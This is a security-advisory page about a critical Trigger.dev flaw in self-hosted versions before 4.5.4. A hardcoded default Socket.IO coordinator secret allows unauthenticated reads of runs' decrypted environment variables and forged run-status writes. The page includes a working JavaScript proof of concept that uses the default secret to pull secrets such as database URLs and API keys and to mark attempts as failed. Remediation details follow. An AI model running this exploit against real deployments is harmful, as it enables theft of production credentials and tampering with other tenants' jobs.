GHSA-gg6r-gp4c-89hpCritical▾ MidnightTrigger.dev: V1 coordinator default-secret unauth Socket.IO
▾ Midnight zone — Critical, or high with PoC / in-the-wild
impact 52.3 · likelihood 0 · exploitation 0
Need a working PoC? Pro members can cast a request and our team develops one — it lands right here.
The /coordinator Socket.IO namespace mounts on every webapp boot and authenticates with a default secret ("coordinator-secret") baked into source. The override variable isn't documented in the self-host docs, .env.example, or helm values, so any operator who didn't read source ships with the default. Once connected, READY_FOR_EXECUTION returns the run's decrypted env vars. Anyone who can reach a default-config self-hosted webapp can pull production secrets out of any run whose internal id they can find.
This attack is made possible by 3 vulnerabilities in Trigger.dev:
PROVIDER_SECRET and COORDINATOR_SECRET are declared with .default("provider-secret") / .default("coordinator-secret") in apps/webapp/app/env.server.ts:289-290. The values are present in the public source repo, neither var is documented in docs/self-hosting/env/*.mdx, hosting/docker/.env.example, or hosting/k8s/helm/values.yaml, and the auth check at packages/core/src/v3/zodNamespace.ts:148 is a plain string compare against that published value
READY_FOR_EXECUTION at apps/webapp/app/v3/handleSocketIo.server.ts:123 calls sharedQueueTasks.getLatestExecutionPayloadFromRun(runId, ...), which at apps/webapp/app/v3/marqs/sharedQueueConsumer.server.ts:1881-1895 returns payload.environment as the run's decrypted env-var dictionary. Any internal runId is enough to exfil that run's full env, regardless of tenant. Note: this read handler lives in V1-only marqs/ code, so it returns nothing for runs on V2 (Run Engine 2.0). Self-hosts still on V1 are fully exposed; v4-only deployments only see the write handlers below
TASK_RUN_COMPLETED, TASK_RUN_COMPLETED_WITH_ACK, TASK_RUN_FAILED_TO_RUN, CHECKPOINT_CREATED, CREATE_WORKER and friends invoke webapp services with attacker-supplied completion / attempt / worker payloads. None of them check that the caller has authority over the runId or attemptId in the message. attempt_* friendlyIds leak through every dashboard URL and emailed alert, so writes are trivially reachable without any internal id
import { io } from "socket.io-client";
const sock = io("https://<self-hosted-target>/coordinator", {
auth: { token: "coordinator-secret" },
transports: ["websocket"],
});
sock.on("connect", () => {
// exfil decrypted env for a known run id
sock.emit("READY_FOR_EXECUTION", { runId: "<runId>", totalCompletions: 0 }, (res) => {
console.log(res.payload.environment);
// { DATABASE_URL: "...", STRIPE_SECRET_KEY: "...", OPENAI_API_KEY: "...", ... }
});
// mark any attempt failed
sock.emit("TASK_RUN_FAILED_TO_RUN", {
completion: {
id: "<attempt_friendlyId>",
ok: false,
error: { type: "INTERNAL_ERROR", code: "FORGED", message: "owned" },
},
});
});
Fixed in v4.5.4. The entire end-of-life V1 (Run Engine 1.0) execution stack was removed in commit 5ba8557a5 (#4236) — including the /coordinator, /provider, and /shared-queue Socket.IO namespaces, packages/core/src/v3/zodNamespace.ts, the marqs shared-queue consumer, and the PROVIDER_SECRET / COORDINATOR_SECRET environment variables.
All three vulnerabilities are absent in v4.5.4 and later: the vulnerable namespaces no longer mount, the READY_FOR_EXECUTION env-var read handler and the unauthenticated write handlers no longer exist, and the hardcoded default secrets are gone.
Affected: self-hosted Trigger.dev < 4.5.4. Vulnerability #2 (decrypted env-var exfiltration) additionally required a deployment still running Run Engine 1.0; v4-only (Run Engine 2.0) deployments were exposed only to the write handlers (#3).
Managed cloud (cloud.trigger.dev) was not affected: it was configured with non-default control-plane secrets, so the default-secret entry point (vulnerability #1) that gates the chain never applied.
Action: self-hosted operators on any release before v4.5.4 should upgrade to v4.5.4 or later.
trigger.dev < 4.5.4Upgrade to a patched release:
trigger.dev 4.5.4Connected by shared product, vendor, weakness, or advisory.
GHSA-pp95-gc86-jq6qHigh· 7.1Trigger.dev: Missing Authentication in Run Replay Action Allows Cross-Organization Task Execution (IDOR)
CVE-2026-85651High· 8.5Trigger.dev versions before 4.5.2 fail to validate environment membership during run replay operations, allowing authenticated attackers to inject task runs into arbitrary environments
GHSA-q567-cr4x-96w4Medium· 5.4Trigger.dev: Blind SSRF via alert-channel webhook
GHSA-59h8-w5q6-mfmpMedium· 5.3Trigger.dev: Unauthenticated Realtime Stream Data Injection via Run FriendlyId
GHSA-4672-hwv6-gq62Medium· 5.4Trigger.dev: Cross-environment deployment cancel
GHSA-9q4r-4842-93vwHigh· 7.7Trigger.dev: Cross-tenant SQL injection in the TSQL query compiler (POST /api/v1/query) via unsanitized window-function name